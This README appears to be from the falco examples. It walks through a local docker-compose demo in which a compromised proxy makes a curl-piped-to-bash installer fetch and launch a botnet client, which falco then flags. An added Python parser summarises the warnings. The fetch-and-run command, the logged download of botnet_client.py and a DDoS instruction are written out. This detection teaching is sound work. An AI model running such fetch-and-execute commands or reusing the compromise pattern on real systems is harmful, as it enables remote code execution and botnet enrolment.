falco/examples/mitm-sh-installer
Mark Stemm 139ee56af7 Docker-compose environment for mitm example. (2016-06-10 16:39:59 -07:00)

Adding docker-compose based example of man-in-the-middle attack against
installation scripts and how it can be detected using sysdig falco.

The docker-compose environment starts a good web server, compromised
nginx installation, evil web server, and a copy of sysdig falco. The
README walks through the process of compromising a client by using
`curl http://localhost/get-software.sh | bash` and detecting the compromise
using `./fbash`.

The fbash program included in this example fixes https://github.com/draios/falco/issues/46.

# Demo of falco with man-in-the-middle attacks on installation scripts

For context, see the corresponding blog post for this demo.

## Demo architecture

## Initial setup

Make sure no prior botnet_client.py processes are lying around.

## Start everything using docker-compose

From this directory, run the following:

```
$ docker-compose -f demo.yml up
```

This starts the following containers:

- `apache`: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
- `nginx`: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
- `evil_apache`: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
- `attacker_botnet_master`: constantly trying to contact the `botnet_client.py` process.
- `falco`: will detect the activities of `botnet_client.py`.

## Download install-software.sh, see botnet client running

Run the following to fetch and execute the installation script, which also installs the botnet client:

```
$ curl http://localhost/install-software.sh | bash
```

You'll see messages about installing the software. (The script doesn't actually install anything; the messages are just for demonstration purposes.)

Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:

```
$ ps auxww  | grep python
...
root   19983  0.1  0.4  33992  8832 pts/1    S    13:34   0:00 python ./botnet_client.py

$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
```

You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:

```
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
```

At this point, kill the botnet_client.py process to clean things up.

## Run installation script again using fbash, note falco warnings

If you run the installation script again:

```
$ curl http://localhost/install-software.sh | ./fbash
```

In the docker-compose output, you'll see the following falco warnings:

```
falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
```
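The warnings above are what an operator would triage in practice, so here is an added example (not part of the falco demo or the falco project) that parses the docker-compose output into structured events: container name, timestamp, priority, rule name, and the `command=` / `connection=` fields. It assumes only the line layout visible above; note that one of the real lines has an empty `connection=` value and the listen warnings have no connection at all, and the parser treats both as "no destination port". The sample text is a copy of the five falco lines above plus one constructed `nginx` line to show that non-falco output is ignored.

```python
import re
from collections import Counter

# Constructed sample: the five falco warnings from the demo output, plus one
# made-up nginx access-log line that the parser must skip.
SAMPLE_OUTPUT = """\
falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
nginx                  | 172.18.0.1 - - "GET /install-software.sh HTTP/1.1" 200
"""

# <container> | <HH:MM:SS.nanos>: <Priority> <rule text> (<key=value fields>)
# The rule text itself contains "non-http(s)", so the fields group is anchored
# on the last "(" that is preceded by whitespace and closed at end of line.
LINE_RE = re.compile(
    r"^(?P<container>\S+)\s*\|\s*"
    r"(?P<ts>\d{2}:\d{2}:\d{2}\.\d+):\s+"
    r"(?P<priority>\w+)\s+"
    r"(?P<rule>.*?)\s+\((?P<fields>.*)\)\s*$"
)
# A key is a bare word followed by "=" at the start or after whitespace;
# this keeps "host:9090/path" inside the curl command from being split.
KEY_RE = re.compile(r"(?:^|\s)(\w+)=")
# src:port->dst:port, works for both IPv4 and "::1" style IPv6 addresses.
CONN_RE = re.compile(r"^(?P<src>.+):(?P<sport>\d+)->(?P<dst>.+):(?P<dport>\d+)$")

HTTP_PORTS = {80, 443}


def parse_fields(text):
    """Split 'command=curl ... connection=...' into a dict.

    Values can contain spaces (the whole curl command line), so each value
    runs from its key up to the next key. An empty value (connection=) is
    kept as ''.
    """
    keys = list(KEY_RE.finditer(text))
    fields = {}
    for i, match in enumerate(keys):
        start = match.end()
        end = keys[i + 1].start() if i + 1 < len(keys) else len(text)
        fields[match.group(1)] = text[start:end].strip()
    return fields


def parse_falco_line(line):
    """Return a dict for a falco warning line, or None for anything else."""
    match = LINE_RE.match(line)
    if not match or match.group("container") != "falco":
        return None
    event = match.groupdict()
    event.update(parse_fields(event.pop("fields")))
    return event


def dest_port(connection):
    """Destination port of a 'src:port->dst:port' field, or None if absent."""
    match = CONN_RE.match(connection or "")
    return int(match.group("dport")) if match else None


def summarize(log_text):
    """Aggregate the events: counts per rule, destination ports outside
    80/443, and the distinct command lines that triggered each rule."""
    events = [e for e in map(parse_falco_line, log_text.splitlines()) if e]
    by_rule = Counter(e["rule"] for e in events)
    ports = {dest_port(e.get("connection")) for e in events}
    ports.discard(None)
    commands = {}
    for e in events:
        commands.setdefault(e["rule"], set()).add(e["command"])
    return {
        "events": len(events),
        "by_rule": dict(by_rule),
        "non_http_ports": sorted(p for p in ports if p not in HTTP_PORTS),
        "commands": {rule: sorted(cmds) for rule, cmds in commands.items()},
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_OUTPUT)
    print(f"{report['events']} falco events")
    for rule, count in report["by_rule"].items():
        print(f"  {count}x {rule}")
        for cmd in report["commands"][rule]:
            print(f"      command: {cmd}")
    print("non-http(s) destination ports:", report["non_http_ports"])
```

Running the module prints the two rules, the curl and python command lines behind them, and port 9090 as the only non-http(s) destination, which is exactly the signal the demo wants an operator to notice: an installer session fetching a second-stage file over an unusual port and then starting a listener.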